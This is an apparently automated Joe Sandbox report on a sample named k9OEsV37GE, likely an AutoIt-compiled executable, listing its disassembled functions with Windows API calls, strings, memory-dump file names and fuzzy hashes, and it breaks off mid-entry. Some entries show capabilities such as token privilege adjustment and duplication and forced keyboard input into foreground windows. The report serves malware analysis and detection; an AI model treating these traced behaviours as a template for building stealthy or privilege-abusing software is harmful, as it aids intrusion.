Function 00F07B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F07BB3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 1e9d89367746fc8bb822d7a74f83982bea5b764f888cb37eea307d3cd4e9cd3e
Instruction ID: 50670d61ab1dc89c6ea3723bcc4e7d66f7b2d6a90a7cc4bf7c7def851d2bde7f
Opcode Fuzzy Hash: 1e9d89367746fc8bb822d7a74f83982bea5b764f888cb37eea307d3cd4e9cd3e
Instruction Fuzzy Hash: D72124B2A04A19EBDB109F11EC817AE7BB4FF543A0F218569E886C51D0EB30D0D0FB01

Function 00F04DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00F04BEF

Part of subcall function 00F2525B: __wfsopen.LIBCMT ref: 00F25266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04E0F

Part of subcall function 00F04B6A: FreeLibrary.KERNEL32(00000000), ref: 00F04BA4

Part of subcall function 00F04C70: _memmove.LIBCMT ref: 00F04CBA

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 5cb1c228b82d8aff7417e465e500221cb0942a9de846d2304fddad4205a02010
Instruction ID: 72b0e6ceb8bf97d6e048443c4206e0a604c0f20db273a1a915cb1193239ec799
Opcode Fuzzy Hash: 5cb1c228b82d8aff7417e465e500221cb0942a9de846d2304fddad4205a02010
Instruction Fuzzy Hash: DC11A772640206ABCF15FF70DC16FAD77A9AF84710F108429F641A71C1DA79A905BB51

Function 00F3FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00F3FD91

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 191deb46ce7799ba1b0d396a96c2187cc57ec192cc212217dee0aa286dd11028
Instruction ID: da825f75f8cc83babd2f4590bc646a25fc536e35e8e10dbf340ed4b36bfa710c
Opcode Fuzzy Hash: 191deb46ce7799ba1b0d396a96c2187cc57ec192cc212217dee0aa286dd11028
Instruction Fuzzy Hash: 242155B5908302DFDB14DF24C844B1ABBE1BF88314F05886CF88A57762D731E849EB92

Function 00F07BCC Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F07C06

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5ee3ecc9df7e979a056df97c299719b1eeec88577dfefa85402a631ec47f11a2
Instruction ID: 7274e4d03796ff0f55829b54fd18ea0b3a9a1caed57cab5cd71029e6d66ac752
Opcode Fuzzy Hash: 5ee3ecc9df7e979a056df97c299719b1eeec88577dfefa85402a631ec47f11a2
Instruction Fuzzy Hash: 1601F572604605AFDB14BF28ED02F2A77E8DF44350F20852EF94AC61E1DE35A881B780

Function 00F24863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00F248A6

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 861460338fa7dfc3f4cc602bdbf9204fdd6e54c4841cdc9c367784cf15041802
Instruction ID: 928f15041b4a2974406872f4f08648f5441e17a6e301513070f75c9007565003
Opcode Fuzzy Hash: 861460338fa7dfc3f4cc602bdbf9204fdd6e54c4841cdc9c367784cf15041802
Instruction Fuzzy Hash: EBF0FF31812228EBDF11AFB0AC063EE36A0AF01332F008404F4209A281DBBC9952FB51

Function 00F04E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04E7E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bf1ef724a866efd1ef11a3dbfecd525c3754ced29cd3348cba21e5d75ae04b33
Instruction ID: 3f5b2fd1154fc591af9a3ad8dede613ab2b28a6c155b9dcc1f867f1f67b994e9
Opcode Fuzzy Hash: bf1ef724a866efd1ef11a3dbfecd525c3754ced29cd3348cba21e5d75ae04b33
Instruction Fuzzy Hash: D1F039B1901B11CFCB349F64E894822BBE1BF143793208A3EE2D682660C732A844FF40

Function 00F20791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F207B0

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: e3eae7ab3b62651049952edccbe8e2d3e6108f0ec00feece00d49c7100696c00
Instruction ID: 729983c27212ee2ed534db5b4ee3c8a6d96afb8a2d48379c7601c03c337d028a
Opcode Fuzzy Hash: e3eae7ab3b62651049952edccbe8e2d3e6108f0ec00feece00d49c7100696c00
Instruction Fuzzy Hash: EAE086769052285BC720E6589C05FEA779DDBC87A0F0541B5FC0CD7248D964AC909690

Function 00F2525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00F25266

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 97d565c7ef1e8792dc02a18d7e9de015dbffe2950c534798b09a37d1396e4138
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 08B0927644020CB7CE012A82FC02A593B199B42B64F408020FB0C181A2A677A664AA8A

Function 018F4F70 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 018F4F81

Memory Dump Source

Source File: 00000000.00000002.1350674871.00000000018F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 018F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f2000_k9OEsV37GE.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: b3e96055f6587f178a1ac157cb31d716a0a50f0211c5c3627ec613a709947d2e
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: B4E0BF7494420D9FDB00EFA4D94969E7BB4EF04301F100165FD05D2281D6309A509A62

Non-executed Functions

Function 00F8CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F8CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CB95
GetWindowLongW.USER32(?,000000F0), ref: 00F8CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8CC00
SendMessageW.USER32 ref: 00F8CC29
_wcsncpy.LIBCMT ref: 00F8CC95
GetKeyState.USER32(00000011), ref: 00F8CCB6
GetKeyState.USER32(00000009), ref: 00F8CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CCD9
GetKeyState.USER32(00000010), ref: 00F8CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8CD0C
SendMessageW.USER32 ref: 00F8CD33
SendMessageW.USER32(?,00001030,?,00F8B348), ref: 00F8CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F8CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F8CE60
SetCapture.USER32(?), ref: 00F8CE69
ClientToScreen.USER32(?,?), ref: 00F8CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F8CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F8CEF5
ReleaseCapture.USER32 ref: 00F8CF00
GetCursorPos.USER32(?), ref: 00F8CF3A
ScreenToClient.USER32(?,?), ref: 00F8CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8CFA3
SendMessageW.USER32 ref: 00F8CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D00E
SendMessageW.USER32 ref: 00F8D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F8D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F8D06D
GetCursorPos.USER32(?), ref: 00F8D08D
ScreenToClient.USER32(?,?), ref: 00F8D09A
GetParent.USER32(?), ref: 00F8D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8D123
SendMessageW.USER32 ref: 00F8D154
ClientToScreen.USER32(?,?), ref: 00F8D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F8D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D20C
SendMessageW.USER32 ref: 00F8D22F
ClientToScreen.USER32(?,?), ref: 00F8D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F8D2B5

Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC

GetWindowLongW.USER32(?,000000F0), ref: 00F8D351

Strings

@GUI_DRAGID, xrefs: 00F8CE9C
F, xrefs: 00F8D235

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: af1363867a2d2efbf4da439ff23863a00210662567c19e607d1c756abd045b96
Instruction ID: a269d910bf1651ffb8dd8e2661e2de696cd1417751065e319118e5410f3ff585
Opcode Fuzzy Hash: af1363867a2d2efbf4da439ff23863a00210662567c19e607d1c756abd045b96
Instruction Fuzzy Hash: 6842AC74604645AFD720EF24CC49FAABBE5FF89720F140619F599872A1C731E844FBA2

Function 00F16F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F171C3
_memset.LIBCMT ref: 00F17539
_memmove.LIBCMT ref: 00F176AC

Strings

\b(?=\w), xrefs: 00F53769
[:<:]], xrefs: 00F17479
[:>:]], xrefs: 00F17492
DEFINE, xrefs: 00F52103
Q\E, xrefs: 00F17FCB
\b(?<=\w), xrefs: 00F53773

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 9b23e4adcaca369b77e7113ccb89ed6ec7221d52ddbfefc2f98cda53d5a2b1b5
Instruction ID: aa85a298dd8a7640ab5bbe1a5bf1a7a6eb6b73d73b7856d019dcf054551e0e44
Opcode Fuzzy Hash: 9b23e4adcaca369b77e7113ccb89ed6ec7221d52ddbfefc2f98cda53d5a2b1b5
Instruction Fuzzy Hash: 8D93B471E04219DBDB24CF58C8817EDB7B1FF48321F25816AEE49AB281E7749D85EB40

Function 00F048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00F048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F3D665
IsIconic.USER32(?), ref: 00F3D66E
ShowWindow.USER32(?,00000009), ref: 00F3D67B
SetForegroundWindow.USER32(?), ref: 00F3D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F3D69B
GetCurrentThreadId.KERNEL32 ref: 00F3D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00F3D6CF
SetForegroundWindow.USER32(?), ref: 00F3D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D6E7
keybd_event.USER32(00000012,00000000), ref: 00F3D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D6FC
keybd_event.USER32(00000012,00000000), ref: 00F3D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D70A
keybd_event.USER32(00000012,00000000), ref: 00F3D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D719
keybd_event.USER32(00000012,00000000), ref: 00F3D71E
SetForegroundWindow.USER32(?), ref: 00F3D721
AttachThreadInput.USER32(?,?,00000000), ref: 00F3D748

Strings

Shell_TrayWnd, xrefs: 00F3D660

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: b36816bce2ebc51f05c7208da43ef2400cbbfac4d29c4241ad52b038270bd08e
Instruction ID: 9f90ecc0794d237abc8b2800d2bb4689ba6d4ecee18eb1c4dd15e9fcd2ca2856
Opcode Fuzzy Hash: b36816bce2ebc51f05c7208da43ef2400cbbfac4d29c4241ad52b038270bd08e
Instruction Fuzzy Hash: 0A315271A4031CBFEB206B619C4AFBF7E6CEB44B60F144025FA05EA1D1D6B05951BBA1

Function 00F58310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00F587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F5882B
Part of subcall function 00F587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58858
Part of subcall function 00F587E1: GetLastError.KERNEL32 ref: 00F58865

_memset.LIBCMT ref: 00F58353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F583A5
CloseHandle.KERNEL32(?), ref: 00F583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F583CD
GetProcessWindowStation.USER32 ref: 00F583E6
SetProcessWindowStation.USER32(00000000), ref: 00F583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F5840A

Part of subcall function 00F581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58309), ref: 00F581E0
Part of subcall function 00F581CB: CloseHandle.KERNEL32(?,?,00F58309), ref: 00F581F2

Strings

, xrefs: 00F58362
default, xrefs: 00F58405
winsta0, xrefs: 00F583C8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 49554e72b2dad157f8d74227e12618891d202289591a837940e3b7e6bddecba0
Instruction ID: d23c774631696c59548eecac73ba5f7c61d6c0c1ff4c48113785fae070dd7f37
Opcode Fuzzy Hash: 49554e72b2dad157f8d74227e12618891d202289591a837940e3b7e6bddecba0
Instruction Fuzzy Hash: CB814C71D00209AFDF119FA4DC45AEE7B78EF04365F184169FE14B6161EB358A1AEB20

Function 00F6C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F6C78D
FindClose.KERNEL32(00000000), ref: 00F6C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F6C844
__swprintf.LIBCMT ref: 00F6C890
__swprintf.LIBCMT ref: 00F6C8D3

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

__swprintf.LIBCMT ref: 00F6C927

Part of subcall function 00F23698: __woutput_l.LIBCMT ref: 00F236F1

__swprintf.LIBCMT ref: 00F6C975

Part of subcall function 00F23698: __flsbuf.LIBCMT ref: 00F23713
Part of subcall function 00F23698: __flsbuf.LIBCMT ref: 00F2372B

__swprintf.LIBCMT ref: 00F6C9C4
__swprintf.LIBCMT ref: 00F6CA13
__swprintf.LIBCMT ref: 00F6CA62

Strings

%02d, xrefs: 00F6C91B, 00F6C925, 00F6C973, 00F6C9C2, 00F6CA11, 00F6CA60
%4d, xrefs: 00F6C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00F6C88A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 964f58c9cdfca430807cf33729d3126d33ebe8af800b8a09476c1e522e0f285e
Instruction ID: 6d0046dad370e80d4a4e7d0649cc5278bf756b53227720aade5a4461ec4575f3
